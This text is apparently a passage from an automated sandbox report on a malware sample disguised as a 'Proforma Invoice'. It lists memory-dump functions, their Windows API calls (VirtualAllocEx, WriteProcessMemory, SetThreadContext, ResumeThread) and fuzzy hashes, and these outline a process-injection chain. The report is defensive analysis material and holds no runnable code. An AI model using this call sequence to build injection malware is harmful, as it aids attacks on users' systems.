Opcode Fuzzy Hash: 52c4d8077647c06c95205a0930e19f5331a5bf2a9719fb3911c5b1bc888e6618
Instruction Fuzzy Hash: 4CA16071D002199FEF20CFA8D881BEEBBF2BF44314F1485A9D919A7250DB749985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 050B9308 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 050B953E

Strings

nCy, xrefs: 050B9372
nCy, xrefs: 050B9343

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: CreateProcess
String ID: nCy$nCy
API String ID: 963392458-1366251309
Opcode ID: 3d68521b4d06a755731d5af43d447c20669f8ff1371299f1447bb7b093f5052d
Instruction ID: 3ee075b51edf600b1b803701fd47336750a6437f84f003180566c4bf1fd66833
Opcode Fuzzy Hash: 3d68521b4d06a755731d5af43d447c20669f8ff1371299f1447bb7b093f5052d
Instruction Fuzzy Hash: E8917071D00219DFEB20CF68D881BEDBBF2BF44314F1485A9D919A7250DB749985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00B85D0C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B85DC9

Strings

nCy, xrefs: 00B85D4C

Memory Dump Source

Source File: 00000000.00000002.1685134454.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Proforma Invoice.jbxd

Similarity

API ID: Create
String ID: nCy
API String ID: 2289755597-4268484829
Opcode ID: 032cd5a952ab24cfbc41a4fbbb64c88d05e2606dabc0b4e070c38538d6aa5232
Instruction ID: a8c90291fbd7b98b314b0548af758d6a555afd1df6e9822f28c3b51600e563c6
Opcode Fuzzy Hash: 032cd5a952ab24cfbc41a4fbbb64c88d05e2606dabc0b4e070c38538d6aa5232
Instruction Fuzzy Hash: A941E2B0C00719CBDB24DFA9C844BDDBBF5BF49304F2480AAD408AB265DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B845A4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B85DC9

Strings

nCy, xrefs: 00B85D4C

Memory Dump Source

Source File: 00000000.00000002.1685134454.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_Proforma Invoice.jbxd

Similarity

API ID: Create
String ID: nCy
API String ID: 2289755597-4268484829
Opcode ID: 49f8820a1edb56d332c168b71d68c1d1eac9fff4fe6a1e87fb5d99af199ab7a3
Instruction ID: a118ac33dc279a59443e4c4186785c4841ead27ba25e96e48ba7aaa20856ccc6
Opcode Fuzzy Hash: 49f8820a1edb56d332c168b71d68c1d1eac9fff4fe6a1e87fb5d99af199ab7a3
Instruction Fuzzy Hash: DC41D1B0C00719CBDB24DFA9D844B9EFBF5BF49304F2480AAE408AB265DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050B9078 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 050B9110

Strings

nCy, xrefs: 050B909F

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: nCy
API String ID: 3559483778-4268484829
Opcode ID: 83ee9c6c2d89c75a8531162fa508e9079a0b733d94df4c5147dec5a705d27e64
Instruction ID: b3ef60968ce5e0b85ad2915ed38d0e061da6d22d0e98f6d8af0a07daf5c80bc9
Opcode Fuzzy Hash: 83ee9c6c2d89c75a8531162fa508e9079a0b733d94df4c5147dec5a705d27e64
Instruction Fuzzy Hash: FD2168B69003599FCB10CFA9D885BEEBBF5FF48310F10882AE959A7240C7789544CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 050B9080 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 050B9110

Strings

nCy, xrefs: 050B909F

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: nCy
API String ID: 3559483778-4268484829
Opcode ID: cd06ffe6ef7125843191701d1c36e1f4fbfbff89774201d60a4ff3a5c29e7dd8
Instruction ID: 73398a312df5a40c1cb0669f1a2c0f2fd80ea83d3ae153b31b3e83f15177f9c1
Opcode Fuzzy Hash: cd06ffe6ef7125843191701d1c36e1f4fbfbff89774201d60a4ff3a5c29e7dd8
Instruction Fuzzy Hash: CE2136B19003599FDB10DFAAC885BDEBBF5FF48310F10882AE959A7250C7789944DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 050B8AAC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050B8B2E

Strings

nCy, xrefs: 050B8ACC

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: ContextThreadWow64
String ID: nCy
API String ID: 983334009-4268484829
Opcode ID: 9046d7a06f468fb7814a7a072d32be8291ca54d27ad1cae2cf1bc2d53ae3e3f4
Instruction ID: 63c895a11cf7186990ce47d3fcd899a415a0c136d8cacdcd514722256144d1b8
Opcode Fuzzy Hash: 9046d7a06f468fb7814a7a072d32be8291ca54d27ad1cae2cf1bc2d53ae3e3f4
Instruction Fuzzy Hash: 372139B19002098FDB10DFAAC485BEEFBF4EF88324F14C42AD459A7250CB789585CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 050B9168 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 050B91F0

Strings

nCy, xrefs: 050B918F

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID: nCy
API String ID: 1726664587-4268484829
Opcode ID: 178969f82a6fef90cf2396a2b2d61a3bd5d3cdf573cc29f4b2bd413ac871e6dd
Instruction ID: 270e10fbca267f78c15134313cc0b25104b7785b8accd972a2f5ddc167df855f
Opcode Fuzzy Hash: 178969f82a6fef90cf2396a2b2d61a3bd5d3cdf573cc29f4b2bd413ac871e6dd
Instruction Fuzzy Hash: 1F2148B1C002599FDB10CFA9D885BEEFBF1FF48310F10882AE559A7250C7789944DB65

Uniqueness

Uniqueness Score: -1.00%

Function 050B8AA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050B8B2E

Strings

nCy, xrefs: 050B8ACC

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: ContextThreadWow64
String ID: nCy
API String ID: 983334009-4268484829
Opcode ID: 717a9cd89d8f8e6e6e143aca145cd2209ce228eba26571455066cfee97b0ec86
Instruction ID: e8e00168d7663791989da11b191c5c238b3645d17c37bd6266c5854f995ba4d3
Opcode Fuzzy Hash: 717a9cd89d8f8e6e6e143aca145cd2209ce228eba26571455066cfee97b0ec86
Instruction Fuzzy Hash: 232138B19042098FDB10CFA9C485BEEBBF5EF88314F14C42AD459A7250C7789986CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 050B916C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 050B91F0

Strings

nCy, xrefs: 050B918F

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID: nCy
API String ID: 1726664587-4268484829
Opcode ID: c2358583fdcdb027c21054d6e19b73154ff90e2933cb08492b451056a7cffeaa
Instruction ID: f4e259cc750572918ae1e82a5343b485b743a3acb85d1120af665dcf98907016
Opcode Fuzzy Hash: c2358583fdcdb027c21054d6e19b73154ff90e2933cb08492b451056a7cffeaa
Instruction Fuzzy Hash: 192159B1C002599FCB10CFAAD985BDEFBF5FF48310F10882AE559A7250C7789544CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 050B9170 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 050B91F0

Strings

nCy, xrefs: 050B918F

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID: nCy
API String ID: 1726664587-4268484829
Opcode ID: bb48be74976fd2ba005d961638731e3b496e846357de2774c93c1c334c3ed255
Instruction ID: 691929814c60d2219078e1e4c6ae374e3270114427ca85d201c16154a6e955ce
Opcode Fuzzy Hash: bb48be74976fd2ba005d961638731e3b496e846357de2774c93c1c334c3ed255
Instruction Fuzzy Hash: 792128B1C002599FDB10DFAAC985BDEFBF5FF48310F108829E559A7250C7789544CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 050B8AB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050B8B2E

Strings

nCy, xrefs: 050B8ACC

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: ContextThreadWow64
String ID: nCy
API String ID: 983334009-4268484829
Opcode ID: 62c59ef2c4063d45eb5db3b05d9fd3ea26a4fa469dde5b53c742d0013ed7bd59
Instruction ID: 390254f3c05a0a3b786b7eaf6e9e3c4cf145398b2fed94d0a4eb9e1442678c62
Opcode Fuzzy Hash: 62c59ef2c4063d45eb5db3b05d9fd3ea26a4fa469dde5b53c742d0013ed7bd59
Instruction Fuzzy Hash: 252118B19002098FDB10DFAAC585BEEFBF4EF88324F14C429D459A7251C7789985CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 050B8FB8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 050B902E

Strings

nCy, xrefs: 050B8FD7

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: AllocVirtual
String ID: nCy
API String ID: 4275171209-4268484829
Opcode ID: d0cec3fb63c1095ab5af8b841e93a6f2414697b2284120ac5f01120aacb52466
Instruction ID: dd4517815cd858cef00d86b81f051f67ed7b43962236cafa37e16e00f34fce4d
Opcode Fuzzy Hash: d0cec3fb63c1095ab5af8b841e93a6f2414697b2284120ac5f01120aacb52466
Instruction Fuzzy Hash: 091167728002499FCB20CFA9D845BEFBFF5EB88324F108419E519A7210C7759584CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 050B8FC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 050B902E

Strings

nCy, xrefs: 050B8FD7

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: AllocVirtual
String ID: nCy
API String ID: 4275171209-4268484829
Opcode ID: a62ff9c4be061074e44d2157297c7da11316d379000b471eb0c1236506f2d40c
Instruction ID: 26f75ad71ff33cf90474a704f0c62c5357c9dca587799053b23310c8f50fd4c0
Opcode Fuzzy Hash: a62ff9c4be061074e44d2157297c7da11316d379000b471eb0c1236506f2d40c
Instruction Fuzzy Hash: AA1167718002499FCB20DFAAC845BDEFFF5EF88320F108819E519A7250C775A544CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 050B89F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 050B8A62

Strings

nCy, xrefs: 050B8A17

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: ResumeThread
String ID: nCy
API String ID: 947044025-4268484829
Opcode ID: e1943617b2b2d2b752187046758b68d8bbf8bb68173ed3f14fd12fd8a2b58617
Instruction ID: a7c734486654f8c8a1a4f5b1a2df59e1192bb5b909ea26b70114055a08a9d946
Opcode Fuzzy Hash: e1943617b2b2d2b752187046758b68d8bbf8bb68173ed3f14fd12fd8a2b58617
Instruction Fuzzy Hash: 4C116AB1D042498FDB20DFA9D4457EEFBF5EF88324F208419D419A7250C7786944CF94

Uniqueness

Uniqueness Score: -1.00%

Function 050B89FC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 050B8A62

Strings

nCy, xrefs: 050B8A17

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: ResumeThread
String ID: nCy
API String ID: 947044025-4268484829
Opcode ID: 288c43963b702b20f2f479a0ce2396c42d0790c1b48f4cc370e139c0c758d717
Instruction ID: ad74ba6ce7f042f315388bea9cdb6255fa790d3848d052d8b1549eb8c619dc5a
Opcode Fuzzy Hash: 288c43963b702b20f2f479a0ce2396c42d0790c1b48f4cc370e139c0c758d717
Instruction Fuzzy Hash: BB116AB1D002598FDB20DFA9D4457EEFBF4EF88324F208429D059A7250C7749944CF94

Uniqueness

Uniqueness Score: -1.00%

Function 050BDB08 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 050BDB6D

Strings

nCy, xrefs: 050BDB2A

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: MessagePost
String ID: nCy
API String ID: 410705778-4268484829
Opcode ID: b92f49c15b210463b1bc2b70cec95cb755831a648d04adaf9d19412e657dcfa1
Instruction ID: 5a509c02d8e54d17e7357422d1c6a3bc8d8b23f88b716c6f4763a0d6ad14532d
Opcode Fuzzy Hash: b92f49c15b210463b1bc2b70cec95cb755831a648d04adaf9d19412e657dcfa1
Instruction Fuzzy Hash: E41113B6800249DFDB10DF99D585BDEFBF8EB48320F108419E418A3600C375A584CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 050B8A00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 050B8A62

Strings

nCy, xrefs: 050B8A17

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: ResumeThread
String ID: nCy
API String ID: 947044025-4268484829
Opcode ID: 9180f59ab59d95508b1437126f9a5284e78fca90692c69537e7f14ec40a7edd3
Instruction ID: c04562f4c39e8f60c7e430783ef1a1b990e5606eb9f25cc4368539e9797d340a
Opcode Fuzzy Hash: 9180f59ab59d95508b1437126f9a5284e78fca90692c69537e7f14ec40a7edd3
Instruction Fuzzy Hash: DD1128B19002498FDB20DFAAD4457EEFBF8EF88324F248419D459A7250C675A944CB95

Uniqueness

Uniqueness Score: -1.00%

Function 050BA6D4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 050BDB6D

Strings

nCy, xrefs: 050BDB2A

Memory Dump Source

Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd

Similarity

API ID: MessagePost
String ID: nCy
API String ID: 410705778-4268484829
Opcode ID: db13d2e4cc7476d1c7977856ecb58c596739d23c03f22ddef3bb53cd63247e3b
Instruction ID: 3e708ea1f2b35802cf3f74f86a66015dddb9f8c1b0d947ac184554ca2fd87fc4
Opcode Fuzzy Hash: db13d2e4cc7476d1c7977856ecb58c596739d23c03f22ddef3bb53cd63247e3b
Instruction Fuzzy Hash: 0E11E3B5800649DFDB10DF99D585BDEFBF8EB48320F108419E555A7200C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06ECDE20 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a4687fbe9af04e3efd9c2f3fcf66aec79283e43a3a5cbdf861d467916f34816
Instruction ID: 184b5edf9e2df7a17f045342870e1bcb7bbe55c30b0029e074d3c53c3c788a2a
Opcode Fuzzy Hash: 9a4687fbe9af04e3efd9c2f3fcf66aec79283e43a3a5cbdf861d467916f34816
Instruction Fuzzy Hash: 6C710074D05218CFDB80DFA8C984AEDFBB5FF49320F10A46AD815A7315D776998ACB80

Uniqueness

Uniqueness Score: -1.00%

Function 06ECD720 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 977e8e8f3468d6ccdc7e81059e6523febd639d4152a0d295bdd3b56c03b17f26
Instruction ID: 8008d6205989a6114f9c6a98e6817ffe76ef9c2fe01302d13497ec871a8815f5
Opcode Fuzzy Hash: 977e8e8f3468d6ccdc7e81059e6523febd639d4152a0d295bdd3b56c03b17f26
Instruction Fuzzy Hash: 5C412AB8909209CFD784CF6ADA409FEB7F9FF8D320B51A0A8D409A7255D732D912CB51

Uniqueness

Uniqueness Score: -1.00%

Function 06ECDA08 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d6a60993d9746dc6d7079b9c86e749d6ff1d5368c1e368f7fc809c9bb4fdb8
Instruction ID: 3e94ddbc82c4dc7dedd381f582613f4a64e5b4f501826ee342b7380520665048
Opcode Fuzzy Hash: 97d6a60993d9746dc6d7079b9c86e749d6ff1d5368c1e368f7fc809c9bb4fdb8
Instruction Fuzzy Hash: 0D412974D48208DFDB40CFA5D984AEEBBB5FF89320F00A029E405A7350D7719941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06ECD888 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70907a781532758576e2cea9be6b7cb37e7081f449fd78e4c63250583c913d83
Instruction ID: 0500cbb1fdc6b65bd6a473bbda642496a80d3980ab6e7f9f120c87d9e0c9bf61
Opcode Fuzzy Hash: 70907a781532758576e2cea9be6b7cb37e7081f449fd78e4c63250583c913d83
Instruction Fuzzy Hash: F231D178905218CFDB80CF95DAA4AEEBBF4FB8D320F1060A9D449A7355C7769911CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06ECD0D0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd127aca385791254b5e352fb970c75f1a999c851abcb4c63e3d5fcb32f30e0
Instruction ID: 1ab8d66b0798d8e43efcac15a74ad5a95b51a8641ede271db3e0139de4c4d7f5
Opcode Fuzzy Hash: 4cd127aca385791254b5e352fb970c75f1a999c851abcb4c63e3d5fcb32f30e0
Instruction Fuzzy Hash: 3231A275E002199FCB08DFA9C9406EEBBF6BF88310F10842AE415B7364EB3559468B91

Uniqueness

Uniqueness Score: -1.00%

Function 00ABD0EC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684577221.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_abd000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae1e12a92f792e6d4792f0d159d3e53bfeb3458c9de43ebdd467da76fcbeb9d
Instruction ID: 6fd6e3931f861fc6367759669c93776cdf288efb929fe4f64c139a602f8300e9
Opcode Fuzzy Hash: 2ae1e12a92f792e6d4792f0d159d3e53bfeb3458c9de43ebdd467da76fcbeb9d
Instruction Fuzzy Hash: EE2104B5544200EFDB04DF18E9C0B66BFA9FB84314F24C66DD8094F297D33AD846CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ABD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684577221.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_abd000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73a28c4b2c73ccb721d15291eb0ca30d7428219e18cfc3a30f17d70b0e09752
Instruction ID: d30a6d334ca5f7eb45af4d9d48eb7c7b2923d838be1123d9e2fdf92ad4ad3a7d
Opcode Fuzzy Hash: a73a28c4b2c73ccb721d15291eb0ca30d7428219e18cfc3a30f17d70b0e09752
Instruction Fuzzy Hash: AC210471504280EFDB05DF14D9C0BA6BFA9FB84314F20C66DE8094B297D336D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 06EC6A08 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfaf6193e9fb44633cf5c3220d3925ad4f32a06d96a28e26944b9702a6510304
Instruction ID: 0f3abe0560d82b0347da4185c803ee63b2af717ed416defadfe24856a67a431f
Opcode Fuzzy Hash: bfaf6193e9fb44633cf5c3220d3925ad4f32a06d96a28e26944b9702a6510304
Instruction Fuzzy Hash: B82155B4E00319DFCB44DFA9C584AAEBBB1FB88314F14D16AC404A7354D7349A82CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00ABD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684577221.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_abd000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 38fb59c395fc6ce62803b22ca18d7e7999d00cfb1b536acf2dbf8c66c50679b3
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 9611BB75504280DFCB02CF10C5C4B95BFA1FB84314F24C6AAD8494B296C33AD80ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00ABD0E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684577221.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_abd000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 137bd78da2eda02ac566a270c65eb5d0894e281c6419be6a4310c64cc6cb980e
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 3A118B75504280DFDB05CF14E9C4B55BFA2FB84314F28C6AAD8494B656C33AD84ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AAD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684506961.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aad000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1deb5a6a7d6b8736a987bc65454f69f3e14751344549a9c15cd32293032dfad2
Instruction ID: 3f2d5e83462cb47ab761573345171d04b2eb97b3cf2cb059cd474522ca93624e
Opcode Fuzzy Hash: 1deb5a6a7d6b8736a987bc65454f69f3e14751344549a9c15cd32293032dfad2
Instruction Fuzzy Hash: 5C012B310083409AE7144F25CD84B67FFA8EF42324F18C52AED4A0F6D6D739D840C671

Uniqueness

Uniqueness Score: -1.00%

Function 00AAD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684506961.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aad000_Proforma Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f455809b7cfc4811535a157376c3d6aa3cf0a52864dcbf238ac660a46f16d4c
Instruction ID: 841112b7b2b6a34b95d5e1323284434ec54260acd145bda1632c2cb8ef21c745
Opcode Fuzzy Hash: 0f455809b7cfc4811535a157376c3d6aa3cf0a52864dcbf238ac660a46f16d4c
Instruction Fuzzy Hash: 8DF0CD71008340AAE7148F1AC888B62FFA8EB92734F18C45AED490F296C3799844CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 06ECD2F8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

